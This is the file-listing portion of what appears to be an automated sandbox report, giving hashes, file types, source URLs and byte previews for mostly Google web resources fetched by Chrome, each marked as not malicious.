                                                                                                                                                                                                                                                                                          SHA-512:25267A2FC7D584564A501EFC8DB74FB5F70451BF378CE6AC6C56BBF0E8C77D055B27DB8A579E4CE67A2BFF162FF82001DF9FEDF83A8B08CA76B1ED60A59BBDD5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/zVX_dAFZOrsdAax2aYItNILgBV4SU93ES5ih12EORRQ4TqiRa7eSbTllW__cwtNCypVoytKiX1opH0Nk4s3MjoB3baA9d-6kwdq2=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF.h..WEBPVP8L.h../.....u!...R...l.Q...1.........(T.P.Y.LG.1.q.cV.!...H..N.s.Df.ID.#.m.<b.k8.....W5...=.R.T.R.TR..........YiL.p.2333...f..{.WO3dBk.....1[v\r.%.._>..9..._X...o$7... "..,..")R..E.J.z.}.z7~N............x?.}.-...!Y,.Y.>2.....k...u=..~..X.d[..+N.N:.I3e.1=....7.2....0..I.$=)....qb[........}..l[U...$.......o;...m$..[...... ..R4.h...G..Q.e.c...i"(.DP..A...@t.zo....]....W.$..z.An.H.D....uw.,!.$G.<......^t.$Hr.6..>..*.h.....m.X.IIN.8....._H..l..3..'.%.......m...mm..?......;.8.....!d......mic.x ..D..L..u....H.{..4........V#...:w...7|?.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8005
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.932879807851235
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:NqJV3s0+3afbOkpJYFOFrxRA9nvpvAk/RH+h80d4D:ET3KSbpoOFNRw6k/Rehxs
                                                                                                                                                                                                                                                                                          MD5:82F73E47F29A0B0B6EA0AC8A67419E3F
                                                                                                                                                                                                                                                                                          SHA1:CAD2C14184D3EB8CBF94E98EE178362F9D494169
                                                                                                                                                                                                                                                                                          SHA-256:A51842A1727B816A7D5B2C8666EAF8EC5F6C00A60972812E3DB65ED315FDEE77
                                                                                                                                                                                                                                                                                          SHA-512:2D25A171AC3A8496035E38E4E823DF6CBD8CE1C1FC89B36F13EF3E46F5831E1AFAF1D796488BCD70C3DD1D0A489FE6752C01C62225CDD2A321BB53BBC33C83B6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/LteTgkerljFQFADjcuSo5-hiLDlUMnxk-QP08xyTBWi-SxZUSDbqeBS-hjK5Gbetam9PLtnpbdMbHBTpR7zBzKxrB6-c-ynRMH6yrcTKaZOVlnLvBc4=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6....NeXIfMM.*.................>...........F.(.............................H.......H....o.#.....IDATx..y.l.U..k.sj.u.7.....=.q.1.p....ID...`....bA.%...# .(....DBB$..&)Q.K$ .;.!.......M......T.9g.....T.....k.R}OG...3}{.....'.......>....V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9..~.]..=..#.^.5"._..})"...^.a..Vp..;.....t.4..B0n.........@6.d..L.Q..!..hiL{..s.........`.`A...c.+..........#...-T<..1...!..$...:.6.a....qv..3m.......jK_,..M............kC.I.q.E....8.f.....5.....'....>.......Z...},"...M......7..c.^.....710....:D.k4.5......J.d.M..Y`I.d....%W.?r....O....9w.=f.z.{.}....k.j.8..%_zj.........8f.!..3X.~.....O..\...f......x.a....._J....H.@.".....B..@6-........p.........r...w....7i..]Y...=....ds.V.\...#....t..V.gr;.....O.......h.T.V.0...$..W..........W&b.I..y*......AZ.Y... Y`o.........!S.S4.$.p#.E<..=....L...'....r....L..a:I..&..;....z......Z
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):333174
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4087140940836322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:uUpi8R+QC0q29MHmjpegMty5eqHwg2MvpKzwq:ZpRsvL29MHUpMqr55q
                                                                                                                                                                                                                                                                                          MD5:824F0EAC369C633AF0D9361091312D0A
                                                                                                                                                                                                                                                                                          SHA1:F5AAE0862A4D51F85C563411B1D44BCDFB8FCD37
                                                                                                                                                                                                                                                                                          SHA-256:46C591C05AB36304491250AD958A722F5AA6E7D3444DEE3AB01FBCB3C1057590
                                                                                                                                                                                                                                                                                          SHA-512:9893D5EA3B2ED9937FC783A950D6FD46615738C754F5E91462157AB15390BDD8176E58447530FB9EC672BEACCE7977E770830798DF89834166E559FD97F19E4A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFn...WEBPVP8Lb.../..D..u!...R...5.Q.3......d.#Q..Z.P..`.....]n....%..P.,U...Y.wWH...kB....M.-o..@..6.1...F.G..D..eZ.t.)e1j.p..........R..+.e.\.qK...T.n/.*[P.(..a.X".....s...M,...m.)......T.XR4D..=21....Ig......}.L...J .....s_'.j...m#=...W /.Y..\.YdWo..BW.@.rH....]L....,...OM...@..p..j..FGl.jg].u...l...m....41.b...o.M;..@......N!..A..D..D@.....!i2.t}........m.$Iy.1+..AF.E.....h...#...%..8Hc.cF..}.1....07..R.$I.j.m...a....w...f......m..9:.......:u..8..|8u.=.03..Qu.F.._......T.C9.Sx.WuF[K..T..........m..H.t}.^..D.L....&...@.z.G......s.._.a..z...:..8;..t6.;.GgOD.@. Td.......?..1w7J.f}V.%I.$I.-$.z....e./n.c.Vm+..}..A........p...jm..=..}\.\....c..o..>....g`....A..p........S.d.$mT..}..{.7.....-..S:.. ....tqlxL..PN.p.p..p.9..r..]..s.n...S..............h.............H.$9.z.'r..u...7.$IbdV.|}~y....]..|.m[..m...['..#..p.N.j&..L..........p.....v.c..Hr.&.d.".....s..............................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9027), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9027
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947824943141241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:GFmlLkHo/a1rOQEo/eKO1O/XozXo/5VoD9ScNOR7cibmxuWK6:GcNn/a1rB//eKO1OQM/0D97OdCxu4
                                                                                                                                                                                                                                                                                          MD5:8F51790BFFFCC31ED97977E0F694A3A6
                                                                                                                                                                                                                                                                                          SHA1:734B38A9909BB10C3F8C6ACDABAF90BE5B01223C
                                                                                                                                                                                                                                                                                          SHA-256:372DCB604072BE98F12E6B48ECF53AA4238767FB34CC47723EEB3FC5552A65D0
                                                                                                                                                                                                                                                                                          SHA-512:EFCCC6A6A96FE86D3F955CC8D10E51EAA8E8230ADA7E57B6DD1110FAFC39F511D71480A20FCE51A7633F947634BB637B023828672C11E268C20DE32D00D5E3F4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/cookienotificationbar.min.css
                                                                                                                                                                                                                                                                                          Preview:.glue-cookie-notification-bar__accept,.glue-cookie-notification-bar__reject{font-size:1rem;line-height:1.5;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;text-rendering:optimizeLegibility;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center;-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center;-webkit-align-self:flex-start;-ms-flex-item-align:start;align-self:flex-start;border:1px solid transparent;border-radius:48px;display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-flow:row nowrap;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-flow:row nowrap;flex-flow:row nowrap;font-family:Google Sans,Arial,Helvetica,sans-serif;font-weight:500;-webkit-justify-content:space-around;-ms-flex-pack:distribute;justify-content:space-around;le
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17382)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):264203
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.5387999815846705
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:98Jax8eulMYeiTuG00blXol0VQbQwM87Y0WsEemtJeNle7YDQ8:92pmF2lq0Ud7WsEemvei7CL
                                                                                                                                                                                                                                                                                          MD5:F7AE519FC4C634068B77F412C54CFB74
                                                                                                                                                                                                                                                                                          SHA1:0C84A1667784BDFC1B08F0371968B75D98802881
                                                                                                                                                                                                                                                                                          SHA-256:11862A85A04F1D9C7D9838C6575D818951ADAC9E4D332594279CD25F1CF35642
                                                                                                                                                                                                                                                                                          SHA-512:81BDF0A1A510B9737D4F28792E8C09F9AFBAC379F48195E33E97038DBF44C82764BB681F35FE4EB429F398396E15A7FC5C38E358E5424CB01D652C686987051C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-5XX3D4K
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"64",. . "macros":[{"function":"__e"},{"function":"__j","vtp_name":"navigator.userAgent"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",2],"vtp_name":"originalLocation"},{"function":"__u","convert_case_to":1,"vtp_component":"QUERY","vtp_queryKey":"utm_source","vtp_customUrlSource":["macro",3],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":["template",["macro",1],":",["macro",4]]},{"function":"__dbg"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"G-QSH16ZFXGX"},{"function":"__c","vtp_value":"sustainability\\.google"},{"function":"__c","vtp_value":"G-TRJS1JHNT3"},
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2842
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.916245544744882
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8Ji0RGsI2kULW/N+oRoiX0wm6A2EQjh6NTpkaVbzByCtdM:QG3WLUN7RoW0wcQd2TKaVbzo
                                                                                                                                                                                                                                                                                          MD5:93F51A891FA68CFB985A5280CE2F6684
                                                                                                                                                                                                                                                                                          SHA1:73D1091E97CE2EB94E310EAEED3C7810938743D7
                                                                                                                                                                                                                                                                                          SHA-256:86CDE5C6EC67D5184DAE8FBBD20DBE83EFE5A4E5EE7661F3092865113F2280B6
                                                                                                                                                                                                                                                                                          SHA-512:BD784E361B1A76B279A4D2491BC2E11075361A557E101C5908892E67E5F02D26BABA27F01853F1E0E4E3894C0242A40DF49303E7452B675EA1357435F8CCFE2F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i2!3i6!4i256!2m3!1e0!2sm!3i707457593!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=32463
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?....m$.?._o..i.m#I..K/c|T.I.".....rx........zol..Y.H$^4..yu^.Wg.......u.f.~.eHn....)G.I@...I.;].X.......Bf9.*G......(=...r..q...6..AK/t.H.i\..........".?...K..M..I\.2'.Ky..r...KEfwB......D]...]).Y...1?[U......*...DgG..l9p.......fM"b.....tQ...ftE.8&0.$.E.i7..!.'*.2...|.......q..|.8.c.....9.....b.oh5^..$.V.IE........U<.d...W..=..>]...N=...9<..r.;..I....x.....8....I.o.......X31.)...ob......'"_6....t.Y...8......".`."....t]..&.........RDV...GS|.%`{2R0..$.+.....9...Ra.<..%.bG.u.h~........:g{,...pF.~...&. eMp..L..c`......h>?..m...(k...zg.vGua.Lu......Y:.L.a..G91...P..+qH........7....+/n...Q+.}p..s?...c..:dw.....}.~t..n....j...[.W\..4.7v_..../.yW.Gb...>9...}./o....35...W^Ds...W.......Gz;..;.#+gnY.m......C.}Hp....Z.......\.V.5<...w_..^h%^:...&.#vw...?q....5.u.Sx....V......!.....nu$[..J..(.f..D91...Tc..Q4:..;.h~.......>:..8"d.NYy.......m...}.|w4c....W...@@Y.@...e........hEf.f.=...J..._.....0+....4n..tQU....#=*[:f(......P.@.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3909)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9115
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.0587900718391925
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:Ywnb1iC9OA9XXMa9kukrALQDUnulGVopLAGCALQD6vnglET31iCLL3d:7B8H3DUulGmmv3D6vglETliCfN
                                                                                                                                                                                                                                                                                          MD5:1EB970CE5A18BEC7165F016DF8238566
                                                                                                                                                                                                                                                                                          SHA1:9EFD1514AF80FE14DB4ED28E9BC53975B9EE089C
                                                                                                                                                                                                                                                                                          SHA-256:70D613E3ACFBA24FD2876FCBACAF639E1E111EF4D54BAF70761C47673F37D6A3
                                                                                                                                                                                                                                                                                          SHA-512:21B4D800CC282CA452F7394E95D5382340AC3481A002C21DA681005A44F18EA6CF43959990CD715B4657F180E0E96D6087FE724F3200E909F9FD70EBCD5511BD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://sharedfiles2.github.io/favicon.ico
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'">. <title>Site not found &middot; GitHub Pages</title>. <style type="text/css" media="screen">. body {. background-color: #f1f1f1;. margin: 0;. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;. }.. .container { margin: 50px auto 40px auto; width: 600px; text-align: center; }.. a { color: #4183c4; text-decoration: none; }. a:hover { text-decoration: underline; }.. h1 { width: 800px; position:relative; left: -100px; letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px 0 50px 0; text-shadow: 0 1px 0 #fff; }. p { color: rgba(0, 0, 0, 0.5); margin: 20px 0; line-height: 1.6; }.. ul { list-style: none; margin: 25px 0; padding: 0; }. li { d
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (524)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):24979
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.394506157479552
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:fOKMUYsCiwPT4C6CjFMBF/rRMqrDxNBphx5kcIeGT0JJqY0nGPxrGCvqIGcQH0xG:eTjqMWkO0Uzyvh5E1I
                                                                                                                                                                                                                                                                                          MD5:2B04C85164506EAE638E22B164F1E546
                                                                                                                                                                                                                                                                                          SHA1:78749945B89716C84F6AA16408931A20D1026F7E
                                                                                                                                                                                                                                                                                          SHA-256:76DCB453AD74580FDA5850BF4D222E3FD237D1A0118B3A54898E225FB555D573
                                                                                                                                                                                                                                                                                          SHA-512:A587B6BE0D983044FA522AA5EE34EE53C142E3F6081C6A2D26DD473A91E89E53C4B2498005222E4BFB50A59F9912BB10660C469524D3C553DDDF635A04480BC6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4"
                                                                                                                                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{._.L$c=_.Ed("P10Owf",[_.gq]);.}catch(e){_._DumpException(e)}.try{._.w("P10Owf");.var GD=function(a){_.A.call(this,a.Ma);this.ka=this.getData("cmep").Kb();this.Ob=a.service.Ob;this.data=a.Td.tda};_.C(GD,_.A);GD.Ga=function(){return{service:{Ob:_.At},Td:{tda:_.mD}}};GD.prototype.wa=function(){this.Ob.ka().oa(this.getRoot().el(),1).log(!0)};GD.prototype.ta=function(a){a=a.data?_.Rb(_.mD,a.data):new _.mD;M$c(this,a)};GD.prototype.oa=function(a){M$c(this,a.data)};.var M$c=function(a,b){var c;(b==null?0:b.Ju())&&((c=a.data)==null?0:c.Ju())&&(b==null?void 0:b.Ju())!==a.data.Ju()||a.Ob.ka().oa(a.getRoot().el(),2).log(!0)};GD.prototype.Ha=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);_.nf(document,_.Uxc)};GD.prototype.Ca=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);if(this.ka){var b;_.nf(document,_.Txc,(b=this.data)==null?void 0:b.Lc())}else _.nf(document,_.Sxc,this.data)};_.L(GD.prototype,"kEOk4d",function(){return this.Ca});_.L(GD.pro
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 163891
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):26750
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.990542445308415
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:384:l+TdRcPIXtxcnrNTHfuHlz8IJ+8odzQ9d8tuKjNZuY6uNmUJI0PcAvaY9WROmZKn:I1uZcw0i89dAusCSfJ9cAvaYqbdAS4
                                                                                                                                                                                                                                                                                          MD5:63814EB4485DA773F92704497D98FF7B
                                                                                                                                                                                                                                                                                          SHA1:C66F42A86116FA4AEBC58E80B94E7EA9E11B4B73
                                                                                                                                                                                                                                                                                          SHA-256:EC3FE28CF73773B138F9F6606A66CD3C2AA7C7C0E981656F49ABE16C9FEE10E0
                                                                                                                                                                                                                                                                                          SHA-512:3F5DADCDACDDCF9F9D5E3C2A2B5CF4E141CB8C6B5989FA157C39FB492AF7344703CD95CD4095AEC675DDCA2BD48EB661990643BC177AFD4E29697714507293AC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=
                                                                                                                                                                                                                                                                                          Preview:...........Ys.H.&..........#....%+.+......mm2..I.@...R0..~D...<......}..^?.~...qwlt..DJT${.H,......s...._....^...,x.7......E.7...a.O=...8..L.(.....rl..5.=....w...e.p.......]N/\..w<..81........;..Z.AK..x......Q.........w.l...s..0.'k.4.....Jn....>..c2..cs....=,3....A.y.4.Q..c..k.>1..X.t,.i..&Sc..f.b.A.9K.....y..3lc.....f..Y..02. 8U.g...^y.0r..H.c9.=8.P.{._.{."..^.\_4..3&Y.].I.../z"..#N./.KZ...x..7.i.gn......z........_EA....r.?..d...N'|N...3{.}.z.......q.;.N8.fvt.-q0Lg.[v.^.[|sl...3...`..Z.f....z......Ao4.,o....l...v....L.......-c{.#3.V...v...'.,+:+.#...._...cGn...j../.;.x..BY^...W)ez.Y.<7....<q.7.......1...EC..lD^p.p.y8.q..}.......0..]4x..|.0b..._4...n..1$U......8..r..4al...=;r....s.>.p:.~.]Xt..K..0.l}...t.).Gn....?v..u.]{.t.~.....Y-.A...>.U.ca.h/..y.....3?X_..G.2|.j6O:.......d.l..|.......>.._.."...[..........'...'...P."(A.~.... ....%v..>.......7....'.}..?...........:.?......x.......X.r....{._.V..P...NZh.W.8R.rM.-..W......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 272 x 92, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5969
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.949719859611916
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:30VjFRx06o9fWBVE+/hVaf6hQrDTq2W4jnjhwKItTD97TPJn/SHbICKV6A4TT8D+:30XRx0QPE+5VBx2W4/WtTRnBnobpQDHe
                                                                                                                                                                                                                                                                                          MD5:8F9327DB2597FA57D2F42B4A6C5A9855
                                                                                                                                                                                                                                                                                          SHA1:1737D3DFB411C07B86ED8BD30F5987A4DC397CC1
                                                                                                                                                                                                                                                                                          SHA-256:5776CD87617EACEC3BC00EBCF530D1924026033EDA852F706C1A675A98915826
                                                                                                                                                                                                                                                                                          SHA-512:B807694ED1EF6DFA6CB5D35B46526FF9584D9AAD66CE4DC93CDEB7B8B103A7C78369D1141D53F092EDDEA0441E982D3A16DF6E98959A5557C288B580CF5191E6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......\............IDATx..]...U..:.....*............].{.A.A.(......\....1........A@6.......$...(.CXX|..d...IUu..dz...g..u.....sO.1..g..W.....~..fv..+.TL.z.q.c..e..;..{..._"...`V...NwUwg....L.{6...y...]...*.2yo.x}^|.....)....444....*.r7.f&.<...t.!.l'8.s..LCCcl...t........ ......;..,a..0.xju........|.*. D%.l._..........]Y.. ...&N.r.~$g...&...Z}.w.3q......RKwm.ihh.I.pL.n..7j.W..%..Ld...@......q7x)..A.x.0..M .H..Wq.g.h..k.|P..-Q.}.Ca...@.A.....D....x.....vOp.....+.z...N...T..o.?...?.%e....&..#..3.....P..Np9...$m.Ne. ..3y?......]....l.).z...g.^.v.!....-...&..M .Eg..w.K. ..;..@.qiP4yhh.....U.l7X-.u...-.tP..X..D.i......p'.T>Y.\o.TM.....xx&...&..M ..{.M*Q...@.......C.ihh...]].ws..L.<.1...M ..>/yl...yhh.Yh..y..n...H.iW!..4444.p'8G.<...4444. .!.$'.._`....&....h=@8..........T.Ao..4444..#..i.q.'t.u........T..+j.ASyjT...u..(f.y.uw...-e.B.*..5.W........m~..5-|_">.j....c[o..m+....K.v.Tak_.".\.....<........u.....},..02..'.h.v.^.....s..A..Ctw
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1440 x 810, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):514066
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.98027050271543
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:060TxfVALpNm7eRpuFBhSZ2FsLumVH9KF4yl8lPmGLmEtYb:0VfVALpE+puFLnFsKvkeGFm
                                                                                                                                                                                                                                                                                          MD5:AC0D88FA9B81D27866FCE3FE8A19C9E4
                                                                                                                                                                                                                                                                                          SHA1:5ADEF1DA1BAD11B9841F189469AF8478F6EEB031
                                                                                                                                                                                                                                                                                          SHA-256:8B2C6AB8A633C6A592A284B420E06A7DB934575EA07880D3275940A3C7F51E38
                                                                                                                                                                                                                                                                                          SHA-512:315B65274E7557248AE9C8FCF4543F576CE4B155DB342A97DE71721FEF3732F8E01CA43421FADAE5F997DC47A188F02B653F26A8BF246D68D1C756BF0A04448A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......*......9q.....sBIT.....O... .IDATx....Hn0.D...Z.*.................3>s=..{..[K.r!..?.... +kUIJ..5.....-..23<>..^!"3#"...s...^.C.3}.;....3......Sl..~.. ...D....b.\VUED...iv...TU.u.|..ct.....0....///.sM.x.9..LD.}UU.3k...L....n.9.<....Jx.-|...). ..L}...............s. ...._.<h....p...'.O_.;'`.K...'....(..vF.U..>/!.....X^;...;..SD.8'\..|.c..!$..d&....7G..%. @UU..........".A6..y..^.*... =..qQ..?Nl5..+..W.../..T..SX]..J.3TBG....p...x....{...+R...c...y.]lK.../.ma.*..E..!z......Vj......v2R...9..J......s..k.A...bQ.....p...7.....m....%KO...I...a..:.b.#.G......{....,.P......=k.......k.&..-.-..i.y......R(.~.....R.b..!.v;..I.N....pb0\*..#.o.8..>e(..W.4.S....!j.....J....v;...5yLQo.8A.....8.S`(...........D.u.Gz...Eg.N.E...s.{...... Jo.Q.V..R..7../KD..~..6.+.).....\e.....;./9?.*.$.d.U.+cS:.."......I.n#.$.H....M.....K....3..jm1:K<6.....F0.....:..XU.0w...W...*....1G.5.......t...5.!...+[...G3....;Y.O..a..........3.....3..X....E+...-A..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1518)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):269484
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.481173643062106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:t5R+/rLk07byKtxMaQTdpJfb3N5PZ3BiS3Zw5oluv3sfaBOCtwHr1DFCx6:R+/XkkGKtQTdp1N/Bl34OuPQCOC+VFCM
                                                                                                                                                                                                                                                                                          MD5:0B51953A796E17B4D9C4223E9D5AFBD6
                                                                                                                                                                                                                                                                                          SHA1:014B3894888F2288222C1AC4698123CF32649FBC
                                                                                                                                                                                                                                                                                          SHA-256:FA80771F7624B00C94526022A986CA657521400C5A9E7A32A09D2628F7DF2FCA
